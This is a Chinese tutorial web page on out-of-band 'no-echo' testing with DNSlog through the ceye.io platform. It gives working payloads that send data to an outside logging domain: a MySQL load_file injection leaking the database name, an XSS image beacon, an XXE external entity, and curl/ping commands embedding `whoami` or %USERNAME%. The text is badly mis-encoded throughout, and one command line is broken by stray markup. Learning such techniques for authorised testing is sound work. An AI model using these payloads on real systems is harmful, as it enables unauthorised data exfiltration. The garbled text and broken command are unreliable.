溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊(cè)×
其他方式登錄
點(diǎn)擊 登錄注冊(cè) 即表示同意《億速云用戶服務(wù)條款》

怎么合理利用DNSLOG進(jìn)行無(wú)回顯安全測(cè)試

發(fā)布時(shí)間:2022-01-10 11:22:32 來(lái)源:億速云 閱讀:181 作者:柒染 欄目:安全技術(shù)

怎么合理利用DNSLOG進(jìn)行無(wú)回顯安全測(cè)試,很多新手對(duì)此不是很清楚,為了幫助大家解決這個(gè)難題,下面小編將為大家詳細(xì)講解,有這方面需求的人可以來(lái)學(xué)習(xí)下,希望你能有所收獲。

在實(shí)際測(cè)試一些網(wǎng)站的安全性問(wèn)題的時(shí)候,有些測(cè)試命令執(zhí)行后是無(wú)回顯的,我們可以寫腳本來(lái)進(jìn)行盲注,但有些網(wǎng)站會(huì)封禁掉我們的ip地址,這樣我們可以通過(guò)設(shè)置ip代理池解決,但是遇到盲注往往效率很低,所以產(chǎn)生了DNSlog注入。

在使用dnslog之前我們需要先了解一下反引號(hào)符號(hào):
符號(hào):`
名稱:反引號(hào),上分隔符
位置:反引號(hào),這個(gè)字符一般在鍵盤的左上角,數(shù)字1的左邊,不要將其同單引號(hào)混淆
作用:反引號(hào)括起來(lái)的字符串被shell解釋為命令行,在執(zhí)行時(shí),shell首先執(zhí)行該命令行,并以它的標(biāo)準(zhǔn)輸出結(jié)果取代整個(gè)反引號(hào)(包括兩個(gè)反引號(hào))部分。
怎么合理利用DNSLOG進(jìn)行無(wú)回顯安全測(cè)試
DNSlog回顯測(cè)試如下:
首先需要有一個(gè)可以配置的域名,比如:ceye.io,然后通過(guò)代理商設(shè)置域名 ceye.io 的 nameserver 為自己的服務(wù)器 A,然后再服務(wù)器 A 上配置好 DNS Server,這樣以來(lái)所有 ceye.io 及其子域名的查詢都會(huì)到 服務(wù)器 A 上,這時(shí)就能夠?qū)崟r(shí)地監(jiān)控域名查詢請(qǐng)求了,圖示如下。
怎么合理利用DNSLOG進(jìn)行無(wú)回顯安全測(cè)試
DNS在解析的時(shí)候會(huì)留下日志,咱們這個(gè)就是讀取多級(jí)域名的解析日志,來(lái)獲取信息
簡(jiǎn)單來(lái)說(shuō)就是把信息放在高級(jí)域名中,傳遞到自己這,然后讀取日志,獲取信息。
這樣說(shuō)原理很抽象,下面通過(guò)實(shí)際例子看下。
http://ceye.io 這是一個(gè)免費(fèi)的記錄dnslog的平臺(tái),我們注冊(cè)后到控制面板會(huì)給你一個(gè)二級(jí)域名:xxx.ceye.io,當(dāng)我們把注入信息放到三級(jí)域名那里,后臺(tái)的日志會(huì)記錄下來(lái)。
怎么合理利用DNSLOG進(jìn)行無(wú)回顯安全測(cè)試

0x01SQL盲注
就以sql盲注為例。深入理解下DNSlog注入過(guò)程:
通過(guò)DNSlog盲注需要用的load_file()函數(shù),所以一般得是root權(quán)限。show variables like '%secure%';查看load_file()可以讀取的磁盤。
1、當(dāng)secure_file_priv為空,就可以讀取磁盤的目錄。
2、當(dāng)secure_file_priv為G:\,就可以讀取G盤的文件。
3、當(dāng)secure_file_priv為null,load_file就不能加載文件。
怎么合理利用DNSLOG進(jìn)行無(wú)回顯安全測(cè)試
通過(guò)設(shè)置my.ini來(lái)配置。secure_file_priv=""就是可以load_flie任意磁盤的文件。
怎么合理利用DNSLOG進(jìn)行無(wú)回顯安全測(cè)試
mysql命令行執(zhí)行:select load_file('\\afanti.xxxx.ceye.io\aaa');其中afanti就是要注入的查詢語(yǔ)句
查看平臺(tái),dnsLog被記錄下來(lái)。
怎么合理利用DNSLOG進(jìn)行無(wú)回顯安全測(cè)試
load_file()函數(shù)可以通過(guò)dns解析請(qǐng)求。
以sql-labs第五關(guān):
payload:' and if((select load_file(concat('\\',(select database()),'.xxxxx.ceye.io\abc'))),1,0)-- -+
執(zhí)行的sql語(yǔ)句:SELECT * FROM users WHERE id='1' and if((select load_file(concat('\\',(select database()),'.xxxxx.ceye.io\abc'))),1,0)
查看dnslog日志,發(fā)現(xiàn)security數(shù)據(jù)庫(kù)被查詢出來(lái):
怎么合理利用DNSLOG進(jìn)行無(wú)回顯安全測(cè)試

0x02 XSS(無(wú)回顯)
通過(guò)盲打,讓觸發(fā)者瀏覽器訪問(wèn)預(yù)設(shè)至的鏈接地址,如果盲打成功,會(huì)在平臺(tái)上收到如下的鏈接訪問(wèn)記錄:
payload:><img src=http://xss.xxxx.ceye.io/aaa>讓src請(qǐng)求我們的dnslog平臺(tái)
怎么合理利用DNSLOG進(jìn)行無(wú)回顯安全測(cè)試

0x03 ×××F(無(wú)回顯)
payload:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [
<!ENTITY % remote SYSTEM "http://ip.port.b182oj.ceye.io/xxe_test">
%remote;]>
<root/>
0x04命令執(zhí)行(無(wú)回顯)
當(dāng) ping 一個(gè)域名時(shí)會(huì)對(duì)其進(jìn)行一個(gè)遞歸 DNS 查詢的過(guò)程,這個(gè)時(shí)候就能在后端獲取到 DNS 的查詢請(qǐng)求,當(dāng)命令真正被執(zhí)行且平臺(tái)收到回顯時(shí)就能說(shuō)明漏洞確實(shí)存在。
Linux
curl http://haha.xxx.ceye.io/`whoami<br/>pingwhoami`.xxxx.ceye.io

Windows
ping %USERNAME%.xxx.ceye.io

怎么合理利用DNSLOG進(jìn)行無(wú)回顯安全測(cè)試

怎么合理利用DNSLOG進(jìn)行無(wú)回顯安全測(cè)試

看完上述內(nèi)容是否對(duì)您有幫助呢?如果還想對(duì)相關(guān)知識(shí)有進(jìn)一步的了解或閱讀更多相關(guān)文章,請(qǐng)關(guān)注億速云行業(yè)資訊頻道,感謝您對(duì)億速云的支持。

向AI問(wèn)一下細(xì)節(jié)

免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng),如果涉及侵權(quán)請(qǐng)聯(lián)系站長(zhǎng)郵箱:is@yisu.com進(jìn)行舉報(bào),并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。

AI